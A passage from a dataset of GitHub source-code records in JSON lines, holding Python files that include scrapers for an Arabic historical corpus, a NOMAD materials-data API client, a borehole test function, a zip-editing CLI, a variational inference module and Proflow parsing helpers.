الإسلام',\n eras[2]: 'عصر بني أمية',\n eras[3]: 'عصر بني العباس',\n eras[4]: 'عصر الدول المتتابعة',\n eras[5]: 'العصر الحديث'\n}\neraStart = [460,610,661,750,1258,1798]\neraEnd = [610,661,750,1258,1798,2019]\npath = str(Path.home())+\"/rawData\" # where to put scraped files\nxmlDir = str(Path.home())+'/xmlCorpus' # where to put xml files\ndef createDirectories():\n import os\n for x in eras:\n if not os.path.isdir(path + '/' + x):\n os.makedirs(path + '/' + x) # line B\n print(x + ' created.')\n\nif __name__ == \"__main__\":\n import islamicbook_scrape\n import news_scrape\n import chi3r_scrape\n import shamela_scrape\n import cleaner\n import os\n\n createDirectories()\n light_scrape = False\n\n options, remainder = getopt.getopt(sys.argv[1:], 'l',[])\n for opt,arg in options:\n if opt == '-l':\n light_scrape = True\n\n\n print('starting to scrape')\n if light_scrape:\n print('light scraping mode selected')\n islamicbook_scrape.scrape_all(1)\n # news_scrape.scrape_all(1)\n chi3r_scrape.scrape_all(5)\n else:\n print('heavy scrape mode selected')\n islamicbook_scrape.scrape_all()\n news_scrape.scrape_all()\n chi3r_scrape.scrape_all()\n shamela_scrape.scrape_all()\n\n print('cleaning...')\n # cleaning\n cleaner.clean()\n\n print('converting to xml...')\n # convert to xml\n if not os.path.isdir(xmlDir):\n os.makedirs(xmlDir) # line B\n cleaner.convertScrapedToXml(xmlDir)","repo_name":"ressay/arabic_historical_corpus","sub_path":"initializer.py","file_name":"initializer.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"22765306484","text":"def getAvailableLetters(lettersGuessed):\n '''\n lettersGuessed: list, what letters have been guessed so far\n returns: string, comprised of letters that represents what letters have not\n yet been guessed.\n '''\n # FILL IN YOUR CODE HERE...\n import string\n characters = string.ascii_lowercase\n return \"\".join([x for x in characters if x not in lettersGuessed])\n\n\nlettersGuessed = ['e', 'i', 'k', 'p', 'r', 's']\nprint(getAvailableLetters(lettersGuessed)) # >> abcdfghjlmnoqtuvwxyz","repo_name":"najuzilu/mit-6.00.1x","sub_path":"Week 3 - Structured Types/week3_problem3.py","file_name":"week3_problem3.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11725309762","text":"class Node:\n\tid_node_dict = {}\n\tcnt = 0\n\tdef __init__(self, id):\n\t\tself.id = id\n\t\tself.friends = set()\n\t\tself.used = False #переменная для обходов, сразу после обхода превращается обратно в False\n\t\tself.number = Node.cnt\n\t\tself.dict_upd()\n\t\tNode.cnt += 1\n\n\tdef dict_upd(self):\n\t\tNode.id_node_dict.update({self.id: self})\n\t\t\n\tdef set_node_coords(node, x, y):\n\t\tnode.coords[0] = x\n\t\tnode.coords[1] = y\n\t\tprint(node.coords)\n\n\t@staticmethod\n\tdef id_to_node(node_id):\n\t\tif node_id in Node.id_node_dict:\n\t\t\treturn Node.id_node_dict[node_id]\n\t\telse:\n\t\t\treturn Node(node_id)\n\t\n","repo_name":"zhitm/graph_vk","sub_path":"node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20022200573","text":"from bravado.client import SwaggerClient\nimport re\nnomad_url = 'http://nomad-lab.eu/prod/rae/api'\n# create the bravado client\nclient = SwaggerClient.from_url('%s/swagger.json' % nomad_url)\n# perform the search request to print number of public entries\ndata = client.repo.search(only_atoms=['Element_1', 'Element_2']).response().result # You can add more elements and same on line 18\n# print the total ammount of search results\ntotal_results=data.pagination.total\npages=int(total_results/50)+1\nprint(total_results)\n# print the data of the first result\n#get_data_check=https://nomad-lab.eu/prod/rae/api/raw/calc/kp7507aMQFKDGPgVTg7GWQ/P8x0nSIuDOUI1bDfF9XroPPi-gP6/vasprun.xml.relax2 -o download.zip\n#url_to_know=https://nomad-lab.eu/prod/rae/api/raw/calc/upload_id/calc_id/vasprun.xml.relax2?length=16384&decompress=true\n#next_test_url=http://nomad-lab.eu/prod/rae/api/raw/query?upload_id=kp7507aMQFKDGPgVTg7GWQ -o download.zip\nnomad_data=[]\nfor j in range(pages):\n\tdata = client.repo.search(only_atoms=['Element_1','Element_2'],page=j+1,per_page=50).response().result\n#\tclient.raw.get(upload_id=calc['upload_id'], path=calc['mainfile']).response()\n\tdata_size=len(data.results)\n\tfor i in range(data_size):\n\t\tprint(data.results[i]['mainfile'])\n\t\tm=re.search(r'vasprun.*',data.results[i]['mainfile'])\n\t\tif m is None:\n\t\t\tprint(\"Nothing\")\n\t\telse:\n\t\t\tprint(m.group(0))\n\t\t\tvasprun_string=m.group(0)\n\t\t\tdata_fetch=\"https://nomad-lab.eu/prod/rae/api/raw/calc/\"+data.results[i]['upload_id']+\"/\"+data.results[i]['calc_id']+\"/\"+vasprun_string\n\t\t\tnomad_data.append([data.results[i]['formula'],data.results[i]['upload_id'],data.results[i]['calc_id'],vasprun_string,data_fetch])\nwith open(\"DownloadFiles.txt\",\"w\") as file:\n\tfor i in range(len(nomad_data)):\n\t\tfile.write(nomad_data[i][0])\n\t\tfile.write(\"\\t\")\n\t\tfile.write(nomad_data[i][1])\n\t\tfile.write(\"\\t\")\n\t\tfile.write(nomad_data[i][2])\n\t\tfile.write(\"\\t\")\n\t\tfile.write(nomad_data[i][3])\n\t\tfile.write(\"\\t\")\n\t\tfile.write(nomad_data[i][4])\n\t\tfile.write(\"\\n\")\nfile.close()\n","repo_name":"bikashtimalsina/nomad-data-client","sub_path":"nomad-data.py","file_name":"nomad-data.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21182064101","text":"import numpy as np\nimport numpy.typing as npt\n\nbounds = np.array(\n [\n [63070, 115600],\n [63.1, 116],\n [990, 1110],\n [700, 820],\n [0, np.inf], # Not sure if the physics have a more meaningful upper bound\n [0.05, 0.15], # Very low probability of being outside of this range\n [9855, 12045],\n [1120, 1680],\n ]\n)\n\n\ndef borehole(H, persis_info, sim_specs, _):\n \"\"\"\n Wraps the borehole function\n \"\"\"\n H_o = np.zeros(H[\"x\"].shape[0], dtype=sim_specs[\"out\"])\n H_o[\"f\"] = borehole_func(H[\"x\"])\n\n return H_o, persis_info\n\n\ndef borehole_func(x: npt.NDArray):\n \"\"\"This evaluates the Borehole function for n-by-8 input\n matrix x, and returns the flow rate through the Borehole. (Harper and Gupta, 1983)\n input:\n\n Parameters\n ----------\n\n x: numpy.typing.NDArray\n\n .. code-block::\n\n x[:,0]: Tu, transmissivity of upper aquifer (m^2/year)\n x[:,1]: Tl, transmissivity of lower aquifer (m^2/year)\n x[:,2]: Hu, potentiometric head of upper aquifer (m)\n x[:,3]: Hl, potentiometric head of lower aquifer (m)\n x[:,4]: r, radius of influence (m)\n x[:,5]: rw, radius of borehole (m)\n x[:,6]: Kw, hydraulic conductivity of borehole (m/year)\n x[:,7]: L, length of borehole (m)\n\n Returns\n -------\n\n f: numpy.ndarray\n vector of dimension (n, 1): flow rate through the Borehole (m^3/year)\n\n \"\"\"\n\n assert np.all(x >= bounds[:, 0]) and np.all(x <= bounds[:, 1]), \"Point not within bounds\"\n\n axis = 1\n if x.ndim == 1:\n axis = 0\n\n (Tu, Tl, Hu, Hl, r, rw, Kw, L) = np.split(x, 8, axis)\n\n numer = 2 * np.pi * Tu * (Hu - Hl)\n denom1 = 2 * L * Tu / (np.log(r / rw) * rw**2 * Kw)\n denom2 = Tu / Tl\n\n return ((numer / (np.log(r / rw) * (1 + denom1 + denom2))).reshape(-1))[0]\n\n\ndef gen_borehole_input(n):\n \"\"\"Generates and returns n inputs for the Borehole function, according to distributions\n outlined in Harper and Gupta (1983).\n\n input:\n n: number of input to generate\n output:\n matrix of (n, 8), input to borehole_func(x) function\n \"\"\"\n\n Tu = np.random.uniform(63070, 115600, n)\n Tl = np.random.uniform(63.1, 116, n)\n Hu = np.random.uniform(990, 1110, n)\n Hl = np.random.uniform(700, 820, n)\n r = np.random.lognormal(7.71, 1.0056, n)\n rw = np.random.normal(0.1, 0.0161812, n)\n Kw = np.random.uniform(9855, 12045, n)\n L = np.random.uniform(1120, 1680, n)\n\n x = np.column_stack((Tu, Tl, Hu, Hl, r, rw, Kw, L))\n return x\n","repo_name":"Libensemble/libensemble","sub_path":"libensemble/sim_funcs/borehole.py","file_name":"borehole.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"3"} +{"seq_id":"38003075171","text":"import os\nfrom glob import glob\nfrom PIL import Image\n\nrd = \"/data/IVC_180814/IVC_Filter_Images/test/\"\nbd = \"/home/mihan/projects/ivc_nocrop/src/gradcam.pytorch/3_detector/results_kfold0.25/heatmaps\"\nod = \"/home/mihan/projects/ivc_nocrop/src/gradcam.pytorch/3_detector/results_kfold0.25/heatmaps_origsize\"\n\ndirs = sorted([os.path.abspath(x) for x in glob(\"%s/*\" %bd)])\nfiles = sorted([os.path.abspath(x) for x in glob(\"%s/*/*\" %bd)])\n\nfor d in dirs:\n nd = od + d.split('heatmaps')[1]\n if not os.path.exists(nd): os.makedirs(nd)\n\nfor f in files:\n img = Image.open(f)\n img_orig = Image.open('%s/%s' %(rd, os.path.basename(f)))\n dim_orig = img_orig.size\n print(f.split('heatmaps')[1], img.size, dim_orig)\n \n outfile = od + f.split('heatmaps')[1]\n img = img.resize((dim_orig[0], dim_orig[1]), Image.ANTIALIAS)\n img.save(outfile)\n","repo_name":"michellehan/ivc_nocrop","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22938009937","text":"import tempfile\nimport click, zipfile, pathlib\nimport os\nimport tempfile\nfrom datetime import date\n\n@click.command()\n@click.option('--zipname', '-zn', help=\"Zip file name\", required=True, prompt=\"Zip file name please\")\n@click.option('--data', '-d', help=\"Example data\", required=True, prompt=\"Example text for VERSION.txt file please\")\n@click.option('--value', '-v', help=\"Update the date in updated.txt file\", required=True, prompt=\"Updated the date? Yes - 1, No - 2\")\ndef supercli(zipname, data, value):\n path = str(pathlib.Path().resolve()) + '\\\\' + zipname + \".zip\"\n try:\n zipfile.ZipFile(path, 'r')\n except FileNotFoundError:\n print(\"Wrong file name.\")\n return\n except zipfile.BadZipFile:\n print(\"The file is corrupted.\")\n return\n \n tmpfd, tmpname = tempfile.mkstemp(dir=os.path.dirname(zipname))\n os.close(tmpfd)\n\n zipname = zipname + '.zip'\n with zipfile.ZipFile(zipname, 'r') as zin:\n with zipfile.ZipFile(tmpname, 'w') as zout:\n for item in zin.infolist():\n if str(value) != '1' and item.filename != 'VERSION.txt':\n zout.writestr(item, zin.read('updated.txt'))\n\n os.remove(zipname)\n os.rename(tmpname, zipname)\n\n with zipfile.ZipFile(zipname, mode='a', compression=zipfile.ZIP_DEFLATED) as zf:\n files = 0\n for file in zf.infolist():\n files = files + 1\n if files == 0:\n zf.writestr('VERSION.txt', data)\n if str(value) == '1':\n zf.writestr('updated.txt', str(date.today()))\n else:\n if str(value) == '1':\n zf.writestr('VERSION.txt', data)\n zf.writestr('updated.txt', str(date.today()))\n else:\n zf.writestr('VERSION.txt', data)\n","repo_name":"adm108/simpleCLI","sub_path":"supercli.py","file_name":"supercli.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15718001517","text":"import logging\n\nfrom bots import imps\nfrom openbb_terminal.decorators import log_start_end\n\nlogger = logging.getLogger(__name__)\n\n\n@log_start_end(log=logger)\ndef quote_command(ticker: str = None):\n \"\"\"Ticker Quote\"\"\"\n\n # Debug\n if imps.DEBUG:\n logger.debug(\"quote %s\", ticker)\n\n # Check for argument\n if ticker is None:\n raise Exception(\"Stock ticker is required\")\n\n df = imps.quote(ticker)\n fig = imps.plot_df(\n df,\n fig_size=(600, 1500),\n col_width=[2, 3],\n tbl_header=imps.PLT_TBL_HEADER,\n tbl_cells=imps.PLT_TBL_CELLS,\n font=imps.PLT_TBL_FONT,\n row_fill_color=imps.PLT_TBL_ROW_COLORS,\n paper_bgcolor=\"rgba(0, 0, 0, 0)\",\n )\n fig.update_traces(cells=(dict(align=\"left\")))\n imagefile = imps.save_image(\"quote.png\", fig)\n\n return {\n \"title\": f\"{ticker.upper()} Quote\",\n \"imagefile\": imagefile,\n }\n","repo_name":"rohankumardubey/OpenBBTerminal","sub_path":"bots/stocks/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"36510369965","text":"import numpy as np\nimport tensorflow as tf\nimport tensorflow_probability as tfp\ntfd=tfp.distributions\n\n\n\ndef init_beta_dist(M):\n in1 = []\n in2 = []\n for i in range(1,M+1):\n in1.append(i)\n in2.append(M-i+1)\n\n return tfd.Beta(in1,in2)\n \ndef init_beta_dist_dash(M):\n M=M-1\n in1 = []\n in2 = []\n for i in range(1,M+1):\n in1.append(i)\n in2.append(M-i+1)\n\n return tfd.Beta(in1,in2)\n\ndef eval_h_MLT(z,theta,beta_dist):\n if (z.shape==()):\n zI=z\n fIm=beta_dist.prob(zI)\n return tf.math.reduce_mean(fIm*theta) \n else:\n zI=tf.reshape(z,[-1,1])\n zI=tf.cast(zI, tf.float32)\n fIm=beta_dist.prob(zI)\n return tf.math.reduce_mean(fIm*theta,axis=1) \n\ndef eval_h_MLT_dash(z, theta, beta_dist_dash):\n len_koeff=theta.shape[0]\n zI=tf.reshape(z,[-1,1])\n zI=tf.cast(zI, tf.float32)\n\n by=beta_dist_dash.prob(zI)\n d_Theta=theta[1:len_koeff]-theta[0:(len_koeff-1)]\n\n bern_dash=tf.reduce_sum(by*d_Theta,axis=1)\n return bern_dash\n\ndef h_z2w(z, a, b, theta, alpha, beta, beta_dist):\n z_tilde=a*z-b\n z_sig=tf.math.sigmoid(z_tilde)\n h_MLT=eval_h_MLT(z=z_sig, theta=theta, beta_dist=beta_dist)\n w=alpha*h_MLT-beta\n return w\n\ndef h_w2z_black_box_inverse(w_to_inverse, a, b, theta, alpha, beta, beta_dist):\n z_optimized = tf.Variable(0.)\n\n a_not_trainable=a.numpy()\n b_not_trainable=b.numpy()\n theta_not_trainable=theta.numpy()\n alpha_not_trainable=alpha.numpy()\n beta_not_trainable=beta.numpy()\n\n loss_fn = lambda: (h_z2w(z=z_optimized,a=a_not_trainable,b=b_not_trainable,theta=theta_not_trainable,alpha=alpha_not_trainable,beta=beta_not_trainable,beta_dist=beta_dist) - w_to_inverse )**2\n tfp.math.minimize(loss_fn,\n num_steps=30, \n optimizer=tf.optimizers.Adam(learning_rate=0.1))\n return z_optimized\n\ndef h_w2z_fake_inverse_taylor(w_to_inverse, a, b, theta, alpha, beta, beta_dist, beta_dist_dash):\n m_plus_1=theta.shape[0]\n\n z=h_w2z_black_box_inverse(w_to_inverse=w_to_inverse,a=a,b=b,theta=theta,alpha=alpha,beta=beta,beta_dist=beta_dist)\n\n z_tilde=a*z-b\n z_sig=tf.math.sigmoid(z_tilde)\n\n taylor0=beta_dist.prob(z_sig)\n taylor1=theta.shape[0]*(0-beta_dist_dash.prob(z_sig)[0:1])\n for i in range(theta.shape[0]-2):\n taylor1=tf.concat((taylor1,(theta.shape[0]*(beta_dist_dash.prob(z_sig)[i:i+1]-beta_dist_dash.prob(z_sig)[i+1:i+2]))),axis=0)\n taylor1=tf.concat((taylor1,(theta.shape[0]*(beta_dist_dash.prob(z_sig)[theta.shape[0]-2:theta.shape[0]-1]))),axis=0)\n\n z_sig_fake=(((w_to_inverse+beta)/alpha)*m_plus_1-tf.reduce_sum(taylor0*theta))/tf.reduce_sum(taylor1*theta)+z_sig\n\n arg_log=1/z_sig_fake-1\n z_fake=(-tf.math.log(arg_log)+b)/a\n\n return z_fake\n\n# Method using derivation\ndef eval_variational_dist(z, a, b, theta, alpha, beta, beta_dist):\n fz=tfd.Normal(loc=0,scale=1).prob(z)\n with tf.GradientTape() as tape:\n tape.watch([z])\n w=h_z2w(z=z,a=a,b=b,theta=theta,alpha=alpha,beta=beta,beta_dist=beta_dist)\n dw_dz = tape.gradient(w, z)\n h_w2z_dash = 1.0 / dw_dz\n q=fz*tf.math.abs(h_w2z_dash)\n return q,w\n\n# Method using epsilon\ndef eval_variational_dist_epsilon(z, z_epsilon, a, b, theta, alpha, beta, beta_dist):\n fz=tfd.Normal(loc=0,scale=1).prob(z)\n w=h_z2w(z=z,a=a,b=b,theta=theta,alpha=alpha,beta=beta,beta_dist=beta_dist)\n w_epsilon=h_z2w(z=z_epsilon,a=a,b=b,theta=theta,alpha=alpha,beta=beta,beta_dist=beta_dist)\n h_w2z_dash=(z_epsilon-z)/(w_epsilon-w)\n q=fz*tf.math.abs(h_w2z_dash)\n return q,w \n\ndef to_a(a_tunable):\n return tf.math.softplus(a_tunable[0:1])\n\ndef to_theta(theta_tunable):\n theta=theta_tunable[0:1]\n for i in range(np.shape(theta_tunable)[0]-1):\n theta=tf.concat((theta,(theta[i:i+1]+tf.math.softplus(theta_tunable[i+1:i+2]))),axis=0)\n return theta\n\ndef to_alpha(alpha_tunable):\n return tf.math.softplus(alpha_tunable[0:1])\n\n\n\n\n\n\nclass VIMLTS:\n def __init__(self, m, using_epsilon=False, epsilon=tf.constant(0.001)):\n self.m=m\n self.num_params=self.m+4\n self.beta_dist=init_beta_dist(self.m)\n self.beta_dist_dash=init_beta_dist_dash(self.m)\n self.using_epsilon=using_epsilon\n self.epsilon=epsilon\n \n def update_lambda_param(self, lambda_update):\n self.a_tilde=lambda_update[0:1]\n self.b=lambda_update[1:2]\n self.theta_delta=lambda_update[2:self.num_params-2]\n self.alpha_tilde=lambda_update[self.num_params-2:self.num_params-1]\n self.beta=lambda_update[self.num_params-1:self.num_params]\n\n def get_target_dist(self, num=1000):\n zz=tf.Variable(np.linspace(-6,6,num),dtype='float32')\n if self.using_epsilon:\n z_epsilon=tf.Variable(zz+self.epsilon)\n q_dist,ww=eval_variational_dist_epsilon(z=zz,z_epsilon=z_epsilon,a=to_a(self.a_tilde), b=self.b, theta=to_theta(self.theta_delta), alpha=to_alpha(self.alpha_tilde), beta=self.beta, beta_dist=self.beta_dist)\n else:\n q_dist,ww=eval_variational_dist(z=zz,a=to_a(self.a_tilde), b=self.b, theta=to_theta(self.theta_delta), alpha=to_alpha(self.alpha_tilde), beta=self.beta, beta_dist=self.beta_dist)\n return q_dist,ww\n\n def get_target_dist_for_z(self,z):\n if self.using_epsilon:\n z_epsilon=tf.Variable(z+self.epsilon)\n q_dist,ww=eval_variational_dist_epsilon(z=z,z_epsilon=z_epsilon,a=to_a(self.a_tilde), b=self.b, theta=to_theta(self.theta_delta), alpha=to_alpha(self.alpha_tilde), beta=self.beta, beta_dist=self.beta_dist)\n else:\n q_dist,ww=eval_variational_dist(z=z,a=to_a(self.a_tilde), b=self.b, theta=to_theta(self.theta_delta), alpha=to_alpha(self.alpha_tilde), beta=self.beta, beta_dist=self.beta_dist)\n\n return q_dist, ww\n\n def get_sample_w(self):\n z_sample = tfd.Normal(loc=0., scale=1.).sample()\n return z_sample,h_z2w(z=z_sample, a=to_a(self.a_tilde), b=self.b, theta=to_theta(self.theta_delta), alpha=to_alpha(self.alpha_tilde), beta=self.beta, beta_dist=self.beta_dist)\n\n def get_h_mlt(self,overValues):\n return eval_h_MLT(z=overValues,theta=to_theta(self.theta_delta),beta_dist=self.beta_dist)\n\n def get_h_mlt_dash(self,overValues):\n return eval_h_MLT_dash(z=overValues,theta=to_theta(self.theta_delta),beta_dist_dash=self.beta_dist_dash)\n\n ##################################################### Debug functions ####################################################\n def get_beta(self,x):\n return self.beta_dist.prob(x)\n\n def get_beta_dash(self,x):\n return self.beta_dist_dash.prob(x)\n\n def get_param(self):\n param_array=to_a(self.a_tilde).numpy()\n param_array=np.concatenate((param_array,self.b.numpy()),axis=0)\n param_array=np.concatenate((param_array,to_theta(self.theta_delta).numpy()),axis=0)\n param_array=np.concatenate((param_array,to_alpha(self.alpha_tilde).numpy()),axis=0)\n param_array=np.concatenate((param_array,self.beta.numpy()),axis=0)\n return param_array\n\n def test_transformation(self,w_test):\n z_test=h_w2z_fake_inverse_taylor(w_to_inverse=w_test, a=to_a(self.a_tilde), b=self.b, theta=to_theta(self.theta_delta), alpha=to_alpha(self.alpha_tilde), beta=self.beta, beta_dist=self.beta_dist, beta_dist_dash=self.beta_dist_dash)\n print(\"ztest:\",z_test)\n return h_z2w(z=z_test, a=to_a(self.a_tilde), b=self.b, theta=to_theta(self.theta_delta), alpha=to_alpha(self.alpha_tilde), beta=self.beta, beta_dist=self.beta_dist)\n \n def print_param(self):\n print(\"self.num_params:\\t\",self.num_params)\n print(\"self.a_tilde:\\t\\t\",self.a_tilde.numpy())\n print(\"a:\\t\\t\\t\",to_a(self.a_tilde).numpy())\n print(\"self.b:\\t\\t\\t\",self.b.numpy())\n print(\"self.theta_delta:\\t\",self.theta_delta.numpy())\n print(\"theta:\\t\\t\\t\",to_theta(self.theta_delta).numpy())\n print(\"self.alpha_tilde:\\t\",self.alpha_tilde.numpy())\n print(\"alpha:\\t\\t\\t\",to_alpha(self.alpha_tilde).numpy())\n print(\"self.beta:\\t\\t\",self.beta.numpy())\n","repo_name":"stefan1893/VIMLTS","sub_path":"src/vimlts.py","file_name":"vimlts.py","file_ext":"py","file_size_in_byte":8100,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"18008824433","text":"'''\n给定两个二叉树,想象当你将它们中的一个覆盖到另一个上时,两个二叉树的一些节点便会重叠。\n你需要将他们合并为一个新的二叉树。合并的规则是如果两个节点重叠,那么将他们的值相加作为节点合并后的新值,否则不为 NULL 的节点将直接作为新二叉树的节点。\n\n示例 1:\n输入:\n\tTree 1 Tree 2\n 1 2\n / \\ / \\\n 3 2 1 3\n / \\ \\\n 5 4 7\n输出:\n合并后的树:\n\t 3\n\t / \\\n\t 4 5\n\t / \\ \\\n\t 5 4 7\n注意: 合并必须从两个树的根节点开始。\n'''\n\n# 递归实现\nclass Solution(object):\n\tdef mergeTrees(self, t1, t2):\n\t\t\"\"\"\n\t\t:type t1: TreeNode\n\t\t:type t2: TreeNode\n\t\t:rtype: TreeNode\n\t\t\"\"\"\n\t\tdef dfs(r1,r2):\n\t\t\t# 如果 r1和r2中,只要有一个是null,函数就直接返回\n\t\t\tif not (r1 and r2):\n\t\t\t\treturn r1 if r1 else r2\n\t\t\t# 让r1的值 等于 r1和r2的值累加\n\t\t\t# 再递归的计算两颗树的左节点、右节点\n\t\t\tr1.val += r2.val\n\t\t\tr1.left = dfs(r1.left,r2.left)\n\t\t\tr1.right = dfs(r1.right,r2.right)\n\t\t\treturn r1\n\t\treturn dfs(t1,t2)\n\n# 迭代实现\nclass Solution(object):\n\tdef mergeTrees(self, t1, t2):\n\t\t\"\"\"\n\t\t:type t1: TreeNode\n\t\t:type t2: TreeNode\n\t\t:rtype: TreeNode\n\t\t\"\"\"\n\t# 如果 t1和t2中,只要有一个是null,函数就直接返回\n\t\tif not (t1 and t2):\n\t\t\treturn t2 if not t1 else t1\n\t\tqueue = [(t1,t2)]\n\t\twhile queue:\n\t\t\tr1,r2 = queue.pop(0)\n\t\t\tr1.val += r2.val\n\t\t\t# 如果r1和r2的左子树都不为空,就放到队列中\n\t\t\t# 如果r1的左子树为空,就把r2的左子树挂到r1的左子树上\n\t\t\tif r1.left and r2.left:\n\t\t\t\tqueue.append((r1.left,r2.left))\n\t\t\telif not r1.left:\n\t\t\t\tr1.left = r2.left\n\t\t\t# 对于右子树也是一样的\n\t\t\tif r1.right and r2.right:\n\t\t\t\tqueue.append((r1.right,r2.right))\n\t\t\telif not r1.right:\n\t\t\t\tr1.right = r2.right\n\t\treturn t1","repo_name":"Chancey-Peng/CodePractice","sub_path":"Simple/617. 合并二叉树.py","file_name":"617. 合并二叉树.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15941056311","text":"from collections import namedtuple\nfrom typing import List, Tuple, TYPE_CHECKING, Callable, Union, Dict\nimport inspect\nimport re\nimport warnings\nimport ast\nimport textwrap\n\nfrom proflow.Objects.Interface import I\n\nif TYPE_CHECKING:\n from proflow.Objects.Process import Process\n\nNEXT_ID = -1\nMAX_AST_DUMP_LENGTH = 1000\n\n\ndef get_id():\n global NEXT_ID\n NEXT_ID += 1\n return NEXT_ID\n\n\ndef reset_id():\n global NEXT_ID\n NEXT_ID = -1\n\n\nclass ProflowParsingError(Exception):\n def __init__(self, message, process: \"Process\"):\n self.message = message\n self.process = process\n # self.source = inspect.getsource(process)\n self.full_message = f\"\"\"Failed to parse the Proflow Process: \\n\nProcess name: {process.comment or process.func.__name__} \\n\nMessage: \"{message}\"\n \"\"\"\n super().__init__(self.full_message)\n\n\nclass ProflowParsingFunctionError(Exception):\n def __init__(self, message, func):\n self.message = message\n self.source = inspect.getsource(func)\n try:\n source_code = textwrap.dedent(inspect.getsource(func))\n ast_tree = ast.parse(source_code)\n ast_dump = ast.dump(ast_tree)\n except Exception:\n ast_dump = \"Failed to dump ast!\"\n\n self.full_message = f\"\"\"Proflow parsing function error: {self.message}\n {self.source}\n AST:\n {ast_dump}\n\"\"\"\n super().__init__(self.full_message)\n\n def __repr__(self):\n return f'Proflow parsing function error: {self.message} \\n {self.source}'\n\n\nclass ProflowParsingLineError(Exception):\n def __init__(self, message, failed_line: str):\n self.message = message\n self.source = failed_line\n super().__init__(self.message)\n\n def __repr__(self):\n return f'Proflow parsing line error: {self.message} \\n {self.source}'\n\n\nclass ProflowParsingAstError(Exception):\n def __init__(self, message, failed_ast):\n ast_dump = ast.dump(failed_ast)[0:MAX_AST_DUMP_LENGTH]\n message = f'{message} \\n ======= ast.dump: \\n {ast_dump} \\n ==='\n self.message = message\n self.ast = failed_ast\n super().__init__(self.message)\n\n def __repr__(self):\n return f'Proflow parsing line error: {self.message}'\n\n\n#: Mapping of argument to the value\nArgMap = Dict[str, str]\n\n\ndef strip_out_comments(string: str) -> str:\n r = re.compile(r'#.*?$', re.MULTILINE)\n return r.sub('', string)\n\n\ndef extract_output_lines(map_inputs_fn: Callable[[object], List[str]]) -> List[str]:\n outputs_source = None\n try:\n outputs_source = strip_out_comments(inspect.getsource(map_inputs_fn))\n if outputs_source[0:len(\"def GET_INPUT_FACTORY_INNER\")] == \"def GET_INPUT_FACTORY_INNER\":\n return []\n\n r_list = re.compile(r'lambda result.*?:.*?\\[(?P.*)\\]', re.DOTALL | re.MULTILINE)\n output_map_raw = r_list.search(outputs_source).groups()[0]\n # Get lines\n r = re.compile(r'(?: |\\[|^)\\((.*?)\\)(?:,|$)$', re.DOTALL | re.MULTILINE)\n matches = r.finditer(output_map_raw)\n lines = (g for match in matches if match is not None for g in match.groups())\n return lines\n except AttributeError as error:\n warnings.warn(Warning(f\"\"\"Failed to parse output lines\n\nError\n=====\n{error}\n\nSource\n======\n{outputs_source}\n\n \"\"\"))\n return []\n\n\ndef remove_inverted_commas_from_arg(arg: str) -> str:\n \"\"\"Remove surrounding '' from string.\"\"\"\n if arg[0] == \"'\" and arg[-1] == \"'\":\n return arg[1:-1]\n else:\n return arg\n\n\ndef parse_key(k: str) -> str:\n \"\"\"Convert a input key to dot notation.\n\n Parameters\n ----------\n k : str\n example: config.a.foo[0][var]\n\n Returns\n -------\n str\n example: config.a.foo.0.[var]\n \"\"\"\n\n def replace_var_fn(x):\n if x.groups()[0] is not None:\n return f'.{x.groups()[0]}.'\n elif x.groups()[1] is not None:\n return f'.{x.groups()[1]}.'\n elif x.groups()[2] is not None:\n return f'.[{x.groups()[2]}].'\n else:\n return 'zzz'\n # step 1. Find state or config\n find_square_brackets = r'\\[(\\d*?)\\]|\\[\\'(\\D*?)\\'\\]|\\[(\\D*?)\\]'\n r = re.compile(find_square_brackets, re.DOTALL)\n # print(list(r.finditer(k)))\n replaced_parts = re.sub(r, replace_var_fn, k)\n replaced_double_dots = re.sub(r'\\.\\.+', '.', replaced_parts)\n out = re.sub(r'^\\'|\\'$|\\.$|^\\.|\\.\\'$', '', replaced_double_dots)\n return out\n\n\ndef rm_inv_comma(string: str):\n return re.sub('^\\'|\\'$', '', string)\n\n\ndef parse_inputs_to_interface(\n process_inputs: Callable[[any], List[I]],\n allow_errors=True,\n) -> List[I]:\n try:\n inputs_map = parse_inputs(process_inputs)\n input_objects = [I(v, as_=k) for k, v in inputs_map.items()]\n except ProflowParsingLineError as e:\n # warnings.warn(Warning(e.message))\n # warnings.warn(Warning(e.source))\n if not allow_errors:\n raise e from e\n return [I(from_='UNKNOWN', as_='UNKNOWN')]\n except TypeError:\n # warnings.warn(Warning(e))\n return [I(from_='ERROR', as_='ERROR')]\n return input_objects\n\n\ndef parse_output_line(output_line: str) -> List[str]:\n output_args = output_line.split(',')\n if len(output_args) != 2:\n raise ProflowParsingLineError('Failed to parse output line', output_line)\n return output_args\n\n\ndef parse_outputs_to_interface(\n process_outputs: Callable[[any], List[I]],\n allow_errors=True,\n) -> List[I]:\n output_lines_row = None\n try:\n parse_outputs_b(process_outputs)\n output_lines_row = extract_output_lines(process_outputs)\n args_and_kwargs = [parse_output_line(line) for line in output_lines_row]\n output_objects = [\n I(from_=args[0], as_=f'state.{rm_inv_comma(args[1].strip())}')\n for args in args_and_kwargs]\n return output_objects\n except ProflowParsingLineError as e:\n # 